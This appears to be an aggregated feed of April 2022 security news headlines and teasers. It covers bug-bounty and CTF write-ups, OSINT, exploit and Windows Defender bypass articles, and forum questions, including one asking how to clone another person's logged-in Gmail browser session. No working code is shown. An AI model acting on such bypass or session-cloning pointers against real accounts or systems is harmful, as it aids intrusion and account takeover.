    Most of time you have seen that when you go to a website and try to access some page which require a user to login first, it redirects you… Continue reading on Medium »
    The time I hacked a Fortune 500 company, but it was out of scope.
    Hi :) thanks for taking some time to read my blog post. This is a short post about a bug I found during my testing of a Fortune 500… Continue reading on Medium »
    Improper cookie not expiring after logged out!
    hey folks! Im Mujibur Rahman from chennai and I’m a security researcher Continue reading on Medium »
    fuzzing and credentials leakage..nice bug hunting writeup
    Here you find a beautiful write-up with useful tips :) Continue reading on Medium »
    Unlock any blur text/picture without membership/subscription on Scribd.com |By Neuchi
    hi, im Neil Harvey Miñano  5 days ago i found a vulnerability on scribd.com when i finding an dork for google sqli Continue reading on System Weakness »
  • Open

    HOW TO ENCRYPT FILE SYSTEM IN RHEL 8
    Hi, I seek your counsel on a way to encrypt a file system partition (i.e /encrypted_data) containing sensitive data file .txt with RBAC on top to allow only application users to access those files, admin access should be restricted with the objective to comply with PCI-DSS. steps are available for that on AIX using efskeymgr however I'm looking for similar steps for Linux. http://www.asgaur.com/wp/how-to-encrypt-file-system-in-aix/ ​ thank you, submitted by /u/Sparthans [link] [comments]
    Looking for resources on industry best practices
    I'm looking for resources for learning about Industry best practices for correcting/dealing with typical vulnerability classes. Blogs, whitepapers, YouTube channels, whatever you find helpful would be much appreciated. This came up as recommended knowledge for an interview for a Product Security Engineer position. This would be primarily dealing with web apps but I'm open for infrastructure security as well. Thanks in advance!!! submitted by /u/rbl00 [link] [comments]
    Help understanding facebook account hijacking?
    I am not looking for advice just information. Obviously there are multiple motives for hijacking a Facebook. Specifically I am curious as it's use for anonymity. I imagine it could be used in a similar way as someone might use someone's offline identity and or credit cards to cover their tracks. My friends account got hijacked by a random and it appears to be being used for foreign political propaganda. Is it easier to highjack an account than make an anonymous one? At least one that would be difficult for local law enforcement or something to trace? Would it circumvent something, make them harder to find? What would be or likely be the benefits/motive for doing it this way? I feel like there's more to this than that I'm not seeing and I'm curious. submitted by /u/fright_end [link] [comments]
  • Open

    Static unpacker and decoder for Hello Kitty Packer
    submitted by /u/GelosSnake [link] [comments]
  • Open

    War in Ukraine / April 24
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Incognito 3.0 OSINT Writeups
    1. ICTF Continue reading on Medium »
  • Open

    SecWiki News 2022-04-25 Review
    SecWiki周刊(第425期) by ourren 软件成分安全分析(SCA)能力的建设与演进 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-25 Review
    SecWiki周刊(第425期) by ourren 软件成分安全分析(SCA)能力的建设与演进 by ourren 更多最新文章,请访问SecWiki
  • Open

    Facebook’s big vulnerability
    Article URL: https://thebucketreport.com/video/facebooks-big-vulnerability Comments URL: https://news.ycombinator.com/item?id=31155935 Points: 35 # Comments: 79
    Vulnerability of avian populations to renewable energy production
    Article URL: https://royalsocietypublishing.org/doi/10.1098/rsos.211558 Comments URL: https://news.ycombinator.com/item?id=31155272 Points: 1 # Comments: 0
  • Open

    Dreaming While Awake
    Interview with Professional Social Engineer — Jenny Radcliffe! Continue reading on ILLUMINATION »
  • Open

    fuzzing and credentials leakage..nice bug hunting writeup
    Here you find a beautiful write-up with useful tips :) Continue reading on Medium »
  • Open

    fuzzing and credentials leakage..nice bug hunting writeup
    Here you find a beautiful write-up with useful tips :) Continue reading on Medium »
  • Open

    Defeating BazarLoader Anti-Analysis Techniques
    Anti-analysis techniques make it harder for malware analysts to do their work. We cover BazarLoader anti-analysis techniques and how to defeat them. The post Defeating BazarLoader Anti-Analysis Techniques appeared first on Unit42.
  • Open

    中央网信办等三部门印发《深入推进IPv6规模部署和应用2022年工作安排》
    到2022年末,物联网IPv6连接数达到1.8亿,固定网络IPv6流量占比达到13%,移动网络IPv6流量占比达到45%。
    谷歌Project Zero报告披露2021年0-day漏洞利用全球趋势
    2021年内,谷歌共检测并披露了58个在野外的0-day漏洞,这一数字创下了项目2014年成立以来的新纪录。
    借由Hack DHS计划,美国国土安全部系统发现了122个安全漏洞
    加入“Hack DHS”漏洞赏金项目(bug bounty program)的赏金猎人已经在国土安全部的外部系统中发现了122个安全漏洞。
    2021年网络与数据安全法规、政策、国标、报告大合集
    本文就我国2021年安全相关政策法规和产业报告进行全面整理,供产业人士参考。
    FreeBuf早报 | 匿名者累计泄露俄罗斯5.8TB数据;安全漏洞创纪录增长
    自从对俄罗斯宣布网络战争以来,匿名者现在已经公布了大约 5.8TB 的俄罗斯数据。
    从欧洲“超算”被黑事件,重新审视和思考威胁情报的价值
    <section>不久前,欧洲多国超级计算机上演“挖矿”风暴,规模之大史无前例。</section><section><br data-mce-bogus="1"></section><section
    Atlassian解决了一个关键的Jira身份验证绕过漏洞
    威胁参与者可以通过向易受攻击的软件发送特制的HTTP 请求来触发漏洞。
    Java加密漏洞PoC代码公开,受影响的版本需尽快升级
    该漏洞已经修复,但由于Poc代码的公开,受影响的版本需尽快修复以防被利用。
    对俄罗斯宣战以来,匿名者累计泄露5.8TB数据
    匿名者宣布对俄罗斯发动网络战争以来,已 公布了约 5.8 TB 的俄罗斯数据。
    哥斯达黎加国家财政系统遭勒索攻击:税务海关停摆
    北美洲国家哥斯达黎加遭到Conti勒索软件攻击,多个部委大量系统受影响瘫痪,大量敏感数据被盗。
    OSSIM平台网络日志关联分析实战
    本文简要介绍了OSSIM平台下的网络日志关联分析技术,希望能给大家提供一些帮助。
  • Open

    Beginners Guide to 0day/CVE AppSec Research
    Article URL: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html Comments URL: https://news.ycombinator.com/item?id=31152385 Points: 2 # Comments: 0
  • Open

    Bypass the Docker Firewall by Abusing REST API
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Tons of gifs and jpegs of Tolkien from Silmarillion and Lord of the Rings
    submitted by /u/FireHole [link] [comments]
  • Open

    [译] BPF ring buffer:使用场景、核心设计及程序示例(2020)
    译者序 本文翻译自 BPF 核心开发者 Andrii Nakryiko 2020 的一篇文章:BPF ring buffer。 文章介绍了 BPF ring buffer 解决的问题及背后的设计,并给出了一些代码示例和内核 patch 链接,深度和广度兼备,是学习 ring buffer 的极佳参考。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1 ringbuf 相比 perfbuf 的改进 1.1 降低内存开销(memory overhead) 1.2 保证事件顺序(event ordering) 1.3 减少数据复制(wasted data copy) 2 ringbuf 使用场景和性能 2.1 常规场景 2.2 高吞吐场景 2.3 不可掩码中断(non-maskable interrupt)场景 2.4 小结 3 示例程序(show me the code) 3.1 perfbuf 示例 内核 BPF 程序 用户空间程序 3.2 ringbuf 示例 内核 BPF 程序 用户空间程序 3.3 ringbuf reserve/commit API 示例 原理 限制 内核 BPF 程序 用户空间程序 4 ringbuf 事件通知控制 4.1 事件通知开销 4.2 perbuf 解决方式 4.3 ringbuf 解决方式 5 总结 很多场景下,BPF 程序都需要将数据发送到用户空间(userspace), BPF perf buffer(perfbuf)是目前这一过程的事实标准,但它存在一些问题,例如 浪费内存(因为其 per-CPU 设计)、事件顺序无法保证等。 作为改进,内核 5.8 引入另一个新的 BPF 数据结构:BPF ring buf…

  • Open

    Hosting for video game servers?
    http://zsr.site.nfoservers.com/ submitted by /u/n0stal6ic [link] [comments]
  • Open

    Red Team operasyonlarında Windows Defender’ı Bypass etme yöntemleri
    Merhaba. Bu içerikte Windows Defender’dan nasıl kurtulabileceği hakkında bazı komut satırlarına değiniyor olacağız. Let’s go. Continue reading on Medium »
  • Open

    Secret from HackTheBox — Detailed Walkthrough
    No content preview
    THM: Raz0rBlack
    No content preview
    How to perform a basic SQL Injection Attack? — Ethical Hacking
    No content preview
  • Open

    Secret from HackTheBox — Detailed Walkthrough
    No content preview
    THM: Raz0rBlack
    No content preview
    How to perform a basic SQL Injection Attack? — Ethical Hacking
    No content preview
  • Open

    Secret from HackTheBox — Detailed Walkthrough
    No content preview
    THM: Raz0rBlack
    No content preview
    How to perform a basic SQL Injection Attack? — Ethical Hacking
    No content preview
  • Open

    --libcurl code injection via trigraphs
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1548535
  • Open

    Shared folder accessed by unauthorized third party?
    Windows 10 Shared external hard drive on my network was making continuous noises as if it were reading/writing large amounts of data. The noises would stop the second I moved my mouse and starting using my machine. This happened on at least 2 occasions. I was pretty suspicious of this, and went and realized I had forgotten to make the hard drive unshared. I had previously shared it so I could back up files from my laptop before formatting. When I attempted to make the drive unshared, and it said a user was connected to it, and if I was sure I wanted to make it unshared if a user was connected. This spooked me quite a bit. My main questions: Is it possible it was talking about my laptop? Are there legitimate Windows 10 processes that can cause a hard drive to make read/write noises when the computer is not in use? submitted by /u/Exact_Frosting_1197 [link] [comments]
    Clone gmail logged in google chrome browser to another laptop
    Is there anyway to clone gmail logged in google chrome browser to another laptop ? ​ Ex: User A is logged in to gmail on google chrome using Laptop1 User B wants to clone User A's chrome with his gmail logging Laptop2 ​ Please suggest any way? ​ Note: User B have all the access to User A's Laptop1 submitted by /u/hasitha1989 [link] [comments]
  • Open

    Process Herpaderping (Mitre:T1055)
    Introduction Johnny Shaw demonstrated a defense evasion technique known as process herpaderping in which an attacker is able to inject malicious code into the mapped The post Process Herpaderping (Mitre:T1055) appeared first on Hacking Articles.
    Process Herpaderping (Mitre:T1055)
    Introduction Johnny Shaw demonstrated a defense evasion technique known as process herpaderping in which an attacker is able to inject malicious code into the mapped The post Process Herpaderping (Mitre:T1055) appeared first on Hacking Articles.
  • Open

    War in Ukraine / April 23
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    10 пошукових систем, про які ви не чули
    Маловідомі пошукові системи для OSINTерів і журналістів: знаходять те, що не може Google. Огляд 10-ти кращих анонімних пошуковиків. Continue reading on KR. LABORATORIES IT BLOG »
    Midnight Flag CTF 2022 — OSINT Write-up
    Dans la nuit du 23 au 24 avril 2022, s’est déroulé le CTF Midnight Flag “Infektion” organisé par les étudiants de l’ESNA (page d’accueil… Continue reading on Medium »
    QUALI PERCORSI INTERDISCIPLINARI PER UNA TEORIA GENERALE DI OSINT?
    Da quasi un ventennio ormai sostengo che l’OSINT — intesa come disciplina — meriti un costrutto teoretico robusto, affidabile, ben… Continue reading on Medium »
    SPY NEWS: 2022 — Week 16
    Summary of the espionage-related news stories for the Week 16 (17–23 April) of 2022. Continue reading on Medium »
  • Open

    EvtxHussar 1.0
    Hi, I recently written tool in Golang which will help me in my forensics work by dumping most common Event ID's from various Windows Event logs (Powershell, Security, System etc.). Event's are highly configurable as they are placed in external YAML files. It differentiate logs by Computer field of last event in .evtx file, so extra logs from VSS, Archive and backups can be included easily. Project is based on evtx library used in Velociraptor. Link to tool: https://github.com/yarox24/EvtxHussar ​ Current categories support: PowerShell (including ScriptBlock reconstruction) Account related modifications Audit log cleared Process creation (including Sysmon) Scheduled Tasks (including extra parsing of XML Content if present) - Creation/Modification and Execution Services ​ In future I plan to add YAML definitions for: Logon events (Yes, this one is important) RDP events WinRM events and others ​ Output formats: - Excel (Default) - CSV - JSON - JSONL ​ Maybe it will be useful for some of you submitted by /u/Yarox45 [link] [comments]
    svchost.exe without '-k' is this a malware ?
    Hello, I did some log investigations in Azure Sentinel and found this process.In a youtube video I saw that this is something suspicious an svchost.exe process without '-k'.How can I investigate this without access to the VM ? Folder path is C:\Windows\System32 Things on cloud are different from on-premise in my opinion . Thanks. submitted by /u/Agent_B99 [link] [comments]
    Crawl through directories when exporting to CSV in autopsy
    So, I'm examining a system that has several folders within folders whose files I would like to export to CSV. Rather than exporting the items in each folder individually, is there a way to crawl through directories to export the info of all files contained in each folder? submitted by /u/roku77 [link] [comments]
    Any options for Samsung T7 touch SSD?
    I have an encrypted Samsung T7 touch external hard drive to process. I have access to most forensic tools. What would be the best option or is it hopeless. (AES 256)? submitted by /u/james1234cb [link] [comments]
  • Open

    SecWiki News 2022-04-24 Review
    2021 年 0day 漏洞利用分析 by ourren 企业安全之浅谈红蓝对抗--下 by ourren 企业安全之浅谈红蓝对抗--上 by ourren 《VirusTotal 2021 年度恶意软件趋势报告》 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-24 Review
    2021 年 0day 漏洞利用分析 by ourren 企业安全之浅谈红蓝对抗--下 by ourren 企业安全之浅谈红蓝对抗--上 by ourren 《VirusTotal 2021 年度恶意软件趋势报告》 by Avenger 更多最新文章,请访问SecWiki
  • Open

    AppSec tales III — Password Recovery
    Application Security Testing of the Password Recovery form guidelines. Continue reading on Medium »
    Redis Exploit Tool
    This tool is for personal safety research study only. Continue reading on Medium »
    Mobile Security Framework (MobSF) Setup — Kali Linux and Windows
    Hello Everyone.. I will explain installation steps of MobSF framework in Kali Linux and Windows OS in this blog. Continue reading on Medium »
  • Open

    “精”准把握静态分析|科恩二进制文件自动化静态漏洞检测工具正式开源
    作者:腾讯科恩实验室 原文链接:https://mp.weixin.qq.com/s/x6jNNvkWRJt1YcHMakWHEg 引言 为提升静态分析在二进制文件漏洞检测领域效率和可扩展性,科恩孵化并开源二进制文件静态漏洞分析工具BinAbsInspector项目。 代码仓库地址:https://github.com/KeenSecurityLab/BinAbsInspector 背景 软...
    The More You Know, The More You Know You Don’t Know——回顾 2021 年在野利用的 0day 漏洞
    作者:Maddie Stone@Google Project Zero 译者:知道创宇404实验室翻译组 原文链接:https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html 这是我们回顾在野利用 0day 漏洞的第三个年度 [2020 年,2019 年]。每年我们都会回顾...
  • Open

    “精”准把握静态分析|科恩二进制文件自动化静态漏洞检测工具正式开源
    作者:腾讯科恩实验室 原文链接:https://mp.weixin.qq.com/s/x6jNNvkWRJt1YcHMakWHEg 引言 为提升静态分析在二进制文件漏洞检测领域效率和可扩展性,科恩孵化并开源二进制文件静态漏洞分析工具BinAbsInspector项目。 代码仓库地址:https://github.com/KeenSecurityLab/BinAbsInspector 背景 软...
    The More You Know, The More You Know You Don’t Know——回顾 2021 年在野利用的 0day 漏洞
    作者:Maddie Stone@Google Project Zero 译者:知道创宇404实验室翻译组 原文链接:https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html 这是我们回顾在野利用 0day 漏洞的第三个年度 [2020 年,2019 年]。每年我们都会回顾...
  • Open

    Pwn2Own 2022迈阿密大赛落幕 去年春季赛冠军蝉联Master of Pwn
    蝉联2021和2022冠军
    FreeBuf早报 | Conti声称对哥斯达黎加的袭击负责;Wawa起诉万事达卡
    QNAP固件更新修复其 NAS 中的 Apache HTTP 漏洞.
    相约「零信任安全论坛」 5月19日云上共话安全
    随着网络威胁更加多元化,传统安全边界已经无法满足企业远程办公的安防需求。
    Lapsus$黑客组织入侵了T-Mobile内部系统
    T-Mobile证实Lapsus$勒索团伙于“几周前”使用被盗凭据入侵了其网络系统,并获得了对内部系统的访问权限。
    挖矿病毒“盯上”了 Docker 服务器
    Lemon_Duck 僵尸网络运营商正进行Monero加密挖矿活动,Docker API 成为其主要攻击目标。
    美国政府向六所大学拨款1200万美元,研发网络攻防工具
    美国能源部(DOE)宣布,将向六所大学团队提供1200万美元资金,用于开发网络攻防工具,以保护美国能源输送系统免受网络攻击。
    美国宣布爬虫合法,万亿级爬虫大军暗流涌动
    互联网竞争日趋白热化的当下,针对线上资产的竞争必将愈演愈烈,爬虫攻击已成为企业线上资产的首要威胁。
    如何为数据库选择最佳加密方法
    加密是保持数据安全的通用过程。在这篇文章中,我们探索了不同的加密方法,以便您可以将信息安全地存储在数据库中。
  • Open

    Profiling a Personal Portfolio of Personal Photos and Security Event Conference Photos - A Compilation
    Folks,Who's on Facebook? Feel free to send me an invitation request and let's catch up. The following photos are a personal Facebook photos compilation which you can feel free to go through in terms of catching up in terms of what I've been up to.Who's on Facebook? Feel free to send me an invitation and let's catch up. The following photos are a personal Facebook photos compilation which you can
  • Open

    FREE ICS related CTF prested by CISA
    submitted by /u/1winway [link] [comments]
  • Open

    Atlassian fixes critical Jira authentication bypass vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-0540 Comments URL: https://news.ycombinator.com/item?id=31140284 Points: 2 # Comments: 0

  • Open

    Super easy manipulation Led to full NFT control
    First of all, i’ll not disclose any information about this Web3 project; I’ll just give an example of what has already been done . Continue reading on NetworkingSec »
    Super easy manipulation Led to full NFT control
    First of all, i’ll not disclose any information about this Web3 project; I’ll just give an example of what has already been done . Continue reading on Medium »
    Beginner’s Guide of Bug Bounty By Arth Bajpai
    Hello Everyone I was thinking about writing something, So I thought why not on the most asked question which is how to start in bug… Continue reading on Medium »
    How I Got Swag From Race Condition
    Hello All, Hope you are having a great time! I am Moin Khokhar Aka Silentknight.bug This Is My First Time Please Forgive Me if Any Grammar… Continue reading on Medium »
    COMO TIVE ACESSO AS INFORMAÇÕES DO BANCO DE DADOS DE UMA GRANDE UNIVERSIDADE.
    VULNERABILIDADE WORDPRESS. Continue reading on Medium »
    How I got Apple Hall Of Fame !
    Continue reading on Medium »
    Walkthrough of “Insecure Deserialization”- PentesterAcademy
    Hello all, This Blog will provide a walkthrough of “Insecure Deserialization Lab” by PentesterAcademy. Continue reading on Medium »
  • Open

    Bluetooth vulnerability in smart Covid test patched, the second to do so
    Article URL: https://www.scmagazine.com/analysis/device-security/bluetooth-vulnerability-in-smart-covid-test-patched-the-second-to-do-so Comments URL: https://news.ycombinator.com/item?id=31136445 Points: 3 # Comments: 0
    Psychic Signatures (Java Vulnerability)
    Article URL: https://www.youtube.com/watch?v=502iGDxuiRk Comments URL: https://news.ycombinator.com/item?id=31130598 Points: 1 # Comments: 0
  • Open

    Renderers can obtain access to random bluetooth device without permission
    Internet Bug Bounty disclosed a bug submitted by palmeral: https://hackerone.com/reports/1519099 - Bounty: $480
    Attacker can bypass authentication build on ingress external auth (`nginx.ingress.kubernetes.io/auth-url`)
    Kubernetes disclosed a bug submitted by thisbug: https://hackerone.com/reports/1357948 - Bounty: $500
  • Open

    Writing a zero findings pentest report
    submitted by /u/DiabloHorn [link] [comments]
    Are vulnerability scores misleading you? Understanding CVSS severity and using them effectively
    submitted by /u/MiguelHzBz [link] [comments]
    Cliam: better cloud agnostic IAM permissions enumerator. Covers AWS and GCP, but more to come!
    submitted by /u/securisec [link] [comments]
  • Open

    Email OSINT
    Today I will talk about sources designed to identify the identities of the owners of email addresses in the framework of OSINT research… Continue reading on Medium »
    War in Ukraine / April 22
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Сервіси для перевірки та моніторингу веб-сайтів і серверів
    Підбірка онлайн-сервісів для перевірки, моніторингу та обслуговування хостів — сайтів, доменів, серверів. Моніторинг електронних ресурсів. Continue reading on KR. LABORATORIES IT BLOG »
    IA fagociterà OSINT?
    In ottica previsionale… una domanda più che legittima. Continue reading on Medium »
    What is there for automated detection of deepfakes?
    Fake Profile Detector (Deepfake, GAN) — this AI model only works on StyleGAN images used to create fake human faces of people that don’t… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    问题频频,盘点近期特斯拉所经历的“网安事故”
    近来,围绕特斯拉数据处理相关的争议乃至系统被破解、泄密的事件时有发生。本文立足于国内和国外两部分,盘点特斯拉所遭遇的“网安事故”。
  • Open

    Offensive con 2022 Talks
    submitted by /u/dmchell [link] [comments]
  • Open

    What else can I be doing to bolster my resume and increase my chances of breaking into the field after I graduate?
    Hello, I am 75% completed with my Bachelors in Cybersecurity and I am trying to do everything I possibly can to break into the field when I graduate. I have lurked the cybersecurity subreddits heavily and have picked up a lot of the general advice. I have obtained my A+, Net+, and Sec+. I have started a homelab and have been doing various exercises within it to get my hands on as many different programs/tools/operating systems/etc as I can. I am learning Python and have made a Github account where I have posted a few basic scripts I have made and will continue to post more as I keep practicing. I have participated in numerous CTFs both small and on the national scale and have placed well in some of them and added them to my LinkedIn. I have started a blog and have been posting just general writeups and blog posts of CTFs or whatever I'm doing within Cybersec at the time. I am working through TryHackMe and have been able to manage a few boxes on HackTheBox. I am sending out resumes to try and find an internship, but I don't seem to be having luck in other states and the state I am in is atrocious for jobs. I plan on leaving forever once I graduate. What else can I be doing to make my resume look good? I'm much more talented at the Blue team side (Packet/Log Analysis, Steg, etc) when I do CTFs, but have a greater interest in red team. I have been eyeing both the Security Blue Team Level 1 and TCM Security's new PNPT cert. They are both relatively cheap and seem like extremely good knowledge that would help me in an interview. submitted by /u/BTBricktop [link] [comments]
    Network still trying to connect to kaspersky labs even though uninstalled
    Edit: I solved this (credits to Sophos UTM Forum by Jay Jay. It's from my sophos firewall. I added kaspersky in my network definition. My router is trying to resolve the domain, while my pihole is blocking it. I removed the network definition entry and the queries stopped. Thanks for all those who helped. Hello, this my be the better subreddit to ask this. I uninstall Kaspersky few months ago from 2 of my computer (PC and surface pro) for obvious reasons. I used revo uninstaller pro so it also scans the registry and delete some remnants of it. I still notice in my pihole logs that it keeps trying to connect to it (I blocked it). It is my top blocked domain. How can I trace whatever it is trying to connect to kaspersky labs on my PC and remove it? Thanks. Edit: I have powered off my PC (switch off from power supply), unplugged my ethernet cable, force shutdown my surface pro using cmd /s /f /t 0 option and put it outside wifi range in my car, I still get queries every minute. I’ll try wireshark to see where the request is coming from and update. submitted by /u/eijisawakita [link] [comments]

  • Open

    Starting a Career
    I passed my OSCP a few months ago. Is that really enough to begin a career? I understand it's literally the floor for expectations (being able to use google, and a general idea of report writing) but it really doesn't feel like it. It sounds insane but I haven't even applied yet for a job because of the absolutely astounding work I've seen online by fellow info sec enthusiasts. It's a high bar of expectation that I doubt I'd be able to fulfill, even if the "actual" job's probably more akin to sending out emails about password policies submitted by /u/smol-dumb-and-gay [link] [comments]
    I'm Looking for a Honeypot for Threat Intel
    Thinking about renting a VPS for Threat Intel and possibly IOC's. No Web, just SSH and maybe with up to date Vuln Library Whats your goto Honeypot? submitted by /u/No_Bumblebee_5793 [link] [comments]
    How to purge emails from Cloud Exchange (E3 license, E5 security)
    Hi All, Recently ran into an issue where someone sent an internal email with information they shouldn't have. Typically, to purge these emails I would use KnowBe4 or Office365's security and compliance: eDisovery. We've used both methods but this way a way larger scale and there are still emails floating around. Some people responded to it or forwarded it. Let's pretend the title was "ABC". We have three subjects then:"ABC""RE: ABC""FW: ABC" We've searched these subjects in eDiscovery and purged the results. It's still not pulling everything as they are still in people's mailboxes. Meaning...those exact subject lines are still being found in user's inboxes. Office365's security and compliance: eDisovery: Search is done through here that gets a collection of emails. We then purge those via powershell. Stuck here as there are plenty still around. Anybody have tools in E5 security they use for this? submitted by /u/compguyguy [link] [comments]
    How is this possible? If your accounts/devices are “taken over” is it possible that you can see the persons browsing history? Also could you see some of their iCloud downloads in your file folder and possibly pics?
    I am seeing business related websites, sale boosting and had a random picture show up when I was adding a new widget. submitted by /u/00miagv00 [link] [comments]
    How do you stay secure?
    Hey, everyone. So I know that there are subs for VPN's, password managers and such. But the information over there is either people arguing that the VPN they use is the best or just shills for NordVPN, Express, etc. So I thought (and hopefully it is okay) if I asked some actual security experts what you do to stay private and secure? If it's allowed, what VPN's or password managers do you use? Or do you use proxies? Or do you not use anything at all? Encrypted email? Any top of the line anti virus software? Or just having the knowledge of not being dumb on the internet? Are all of these privacy clients even worth it? I know that the first and foremost course of action is having some sense when it comes to the internet; i.e. Not clicking on suspicious links, not downloading random files, etc. But I would assume these programs have their pros, right? I am getting into the cyber security world and there is just SO many companies out there so I just thought I would ask some people who actually are in this field. I hope that is okay! ​ Thanks submitted by /u/strings_on_a_hoodie [link] [comments]
    Average lifetime of an IoC
    Hello threat analyst stranger, ​ For you, and based on your experience, what is the average lifetime for an IoC? the goal here is to automate the IoC requalification. When should i requalify my IoCs :) ​ I would say: Hash: 10 days Domain: 1 month IP: 5 month ​ thank you ! submitted by /u/Immediate-Sentence-4 [link] [comments]
    Can an ISP see what browser you’re using and do they see your browsing history or traffic any differently whether you’re using Chrome or Firefox?
    Can an ISP see what browser you’re using and do they see your browsing history or traffic any differently whether you’re using Chrome or Firefox? submitted by /u/Available-Fly7541 [link] [comments]
    About information on security news
    Hello, I'm NewB who is studying security. I'm looking for a blog or page about security, so is there anyone who can share it? I like the latest security news, OSint and search engine, and articles about vulnerabilities that I'm most interested in. I'm writing here because I want to hear a lot of news and information submitted by /u/Alexiosplana [link] [comments]
    Computer Recognition Authentication
    I'm interested in this form of authentication, but can't seem find a heck of a lot about it, can anyone point me in right direction to learn more? submitted by /u/ahpto [link] [comments]
  • Open

    Mainly memes; some OSTs and bass boosted songs (many memes are NSFW)
    https://dl.abstract.land/ submitted by /u/steamsy_ [link] [comments]
  • Open

    GEO-LOCATION WITHOUT STREET VIEW
    This might be coming out late, but hey better be late than never. Continue reading on Osintfun »
    War in Ukraine / April 21
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    COS’È LA I-SFERA
    Idee, valori e contenuti per l’innovazione disciplinare nell’Intelligence delle Fonti Aperte e Originarie Continue reading on Medium »
    Finding Luther — An OSINT Geo location Challenge.
    London was an amazing terrain to do GEOINT. Its intricate small roads in between the buildings made it more complex & beautiful. To my… Continue reading on Medium »
  • Open

    A Detailed Guide on Hydra
    Hello! Pentesters, this article is about a brute-forcing tool Hydra. Hydra is one of the favourite tools of security researchers and consultants. Being an excellent The post A Detailed Guide on Hydra appeared first on Hacking Articles.
    A Detailed Guide on Hydra
    Hello! Pentesters, this article is about a brute-forcing tool Hydra. Hydra is one of the favourite tools of security researchers and consultants. Being an excellent The post A Detailed Guide on Hydra appeared first on Hacking Articles.
  • Open

    Any CREST CPIA guidance for help?
    Hello guys, I decide to take CPIA exam however other than the syllabus CREST recommend, I cant find any other extra information. I am really interest in forensic pathway, but it is really less guidance or advice I can refer. :( submitted by /u/NoIdeaForMyFuture [link] [comments]
    M.2 Drive
    Can you create an image of an M.2 drive? Is the process the same as any other HDD or are there any restrictions? submitted by /u/Beep-Boop-Bop-Boop [link] [comments]
    Encase problem in question
    submitted by /u/Metriczcaptian88 [link] [comments]
  • Open

    No Hardware, No Problem: Emulation and Exploitation
    submitted by /u/0xdea [link] [comments]
    The Illustrated QUIC Connection
    submitted by /u/syncsynchalt [link] [comments]
    WSO2 RCE (CVE-2022-29464) exploit and writeup
    submitted by /u/0xdea [link] [comments]
    Hardware Security Talks Announced! Hardwear.io
    submitted by /u/hardweario [link] [comments]
    Abusing Azure Container Registry Tasks from Specter-Ops
    submitted by /u/gdraperi [link] [comments]
    Null ECDSA Signatures - Proof of concept for bypassing JWT signature checks using CVE-2022-21449
    submitted by /u/thorn42 [link] [comments]
    Smashing the Modern Web Tech Stack — Part 1: The Evolving Threat Landscape in 2022 and DOM-based XSS in Cloud-Native React Apps
    submitted by /u/MalwareJoe [link] [comments]
  • Open

    Removing the Stigma of a CVE
    Article URL: https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/ Comments URL: https://news.ycombinator.com/item?id=31123900 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-04-22 Review
    TheRoadOfSO: 学习安全运营的记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-22 Review
    TheRoadOfSO: 学习安全运营的记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    CSS Transition 기반의 ontransitionend XSS
    @garethheyes가 또 새로운 XSS 벡터를 만들어 왔습니다. 바로 ontransitionend 란 이벤트 핸들러인데요. 이 이벤트 핸들러는 transition, 즉 CSS의 애니메이션이 끝날 때 동작하며 동작을 위해선 해당 Element에 포커스 상태가 되어야합니다. 1 2 3 4 5 display: block; transition: outline 1s; test 위 코드 기반이고, 약간 더 살펴보죠. CSS Transition Transition은 CSS에서 속성이 변경될 때 애니메이션 속도를 명시하는 값입니다. 아래와 같이 값으로 동작할 CSS 속성과, 시간 값이 들어가게 됩니다.
    Metasploit 데이터를 Httpx로?
    오랜만에 Metasploit 관련 글을 쓰는 것 같습니다. 다름이 아니라 netpen이라는 plugin을 하나 찾았는데, 이를 이용하면 Metasploit으로 수집한 정보를 가지고 nuclei나 zap/burp 등 다른 도구와 파이프 라인으로 구성해서 사용하기 좋아보였습니다. Netpen 공식 플러그인은 아니고 wdahlenburg가 만들어둔 플러그인 스크립트로 metasploit에서 수집된 정보를 host:port 형태로 콤보 리스트를 만들어줍니다. 간단한 작업이지만 막상 metasploit으로 수집하고 이를 다시 파싱하려면 약간 귀찮은데요. 이 플러그인은 이러한 점을 딱 해결해줍니다. https://github.com/wdahlenburg/MSF-Plugins/blob/main/netpen.rb Add plugin repo에서 코드를 받아서 metasploit의 plugin 디렉토리에 넣어줍니다.
  • Open

    34 year old starting in Exploit Development, got a chance ?
    Hello there. I've done some some pentesting work and jobs, but i've have a passion to get into the exploit development and cracking field and lookind forward to get a real life job However i am 34 year old, do i still a chance or i will be wasting time ? submitted by /u/morizk90 [link] [comments]
  • Open

    How I Bypass 2FA while Resetting Password
    It was a private program on “Hackerone” , I had set target in my mind that I have to bypass 2fa, so I checked every method to bypass “Two… Continue reading on InfoSec Write-ups »
    Pythonic Malware Part-2: Reversing Python Executables
    In Pythonic Malware Part-1, I demonstrated how Python executables can be used to bypass Windows Defender and successfully launch… Continue reading on InfoSec Write-ups »
    A Facebook Bug that Disclosed Unused Custom Thumbnails of Any Facebook Page’s Public Videos
    No content preview
  • Open

    How I Bypass 2FA while Resetting Password
    It was a private program on “Hackerone” , I had set target in my mind that I have to bypass 2fa, so I checked every method to bypass “Two… Continue reading on InfoSec Write-ups »
    Pythonic Malware Part-2: Reversing Python Executables
    In Pythonic Malware Part-1, I demonstrated how Python executables can be used to bypass Windows Defender and successfully launch… Continue reading on InfoSec Write-ups »
